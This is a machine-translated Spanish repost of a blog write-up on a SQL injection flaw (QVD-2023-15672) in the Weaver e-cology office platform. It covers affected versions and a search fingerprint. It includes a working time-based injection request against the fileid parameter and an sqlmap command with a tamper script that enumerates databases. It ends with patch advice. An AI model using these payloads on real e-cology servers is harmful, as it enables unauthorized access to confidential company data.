Vuelve a aparecer la vulnerabilidad de inyección SQL de Panwei E-Cology【QVD-2023-15672】

Descargo de responsabilidad: No utilice las tecnologías relevantes en este artículo para participar en pruebas ilegales. Cualquier consecuencia directa o indirecta y las pérdidas causadas por la difusión y el uso de la información o las herramientas proporcionadas en este artículo correrán a cargo del propio usuario. Las consecuencias adversas tienen nada que ver con el autor del artículo. Este artículo es solo para fines educativos.

1. Introducción del producto

e-cology, una plataforma de aplicación de gestión colaborativa pan-micro, es un conjunto de portal de información empresarial, gestión de documentos de conocimiento, gestión de flujo de trabajo, gestión de recursos humanos, gestión de relaciones con clientes, gestión de proyectos, gestión financiera, gestión de activos, gestión de la cadena de suministro, y funciones de centros de datos Una plataforma de gestión colaborativa a gran escala para empresas.

2. Visión general de la vulnerabilidad

Debido a que Fanwei e-cology no filtró de manera efectiva la entrada del usuario, la empalmó directamente en la declaración de consulta SQL, lo que resultó en una vulnerabilidad de inyección SQL en el sistema. Los atacantes remotos no autorizados pueden usar esta vulnerabilidad para obtener información confidencial y explotarla aún más para obtener permisos del sistema de destino.

3. Ámbito de influencia

Versión del parche Ecology 9.x < 10.58.0

Versión del parche Ecology 8.x < 10.58.0

4. Ambiente de reproducción

Intergraph huella digital:
web.icon="41eca7a9245394106a09b2534d8030df"

inserte la descripción de la imagen aquí

5. Recurrencia de la vulnerabilidad

PoC

GET /weaver/weaver.file.FileDownloadForOutDoc/?fileid=123+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1 HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

PD: El campo fileid es el punto de inyección, tanto post como get están disponibles. Después de la prueba, el valor de fileid (que se puede construir a voluntad) debe reemplazarse cada vez que se inyecta, de lo contrario no tendrá éxito (puede pruébelo usted mismo) Este es también el punto débil de la vulnerabilidad.

inserte la descripción de la imagen aquí
Dragón POC

inserte la descripción de la imagen aquí
Ideas de uso de SQLmap

Escriba un script de manipulación que atraviese el número aleatorio de cada solicitud para cooperar con la carga útil para lograr la inyección

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

fileid=12*&isFromOutImg=1

Trate de inyectar:

python3 sqlmap.py -r post.txt --tamper=ecology_sql_random.py --batch --dbs

inserte la descripción de la imagen aquí

6. Sugerencia de reparación

Solución de mitigación temporal
Limite las direcciones de origen de acceso y no abra el sistema a Internet a menos que sea necesario.

Plan de actualización y reparación
Actualmente, se ha lanzado el parche de seguridad oficial y se recomienda que los usuarios afectados actualicen a la versión 10.58 o superior lo antes posible.
https://www.weaver.com.cn/cs/securityDownload.asp#

Supongo que te gusta

Origin blog.csdn.net/holyxp/article/details/131868278
Recomendado
Clasificación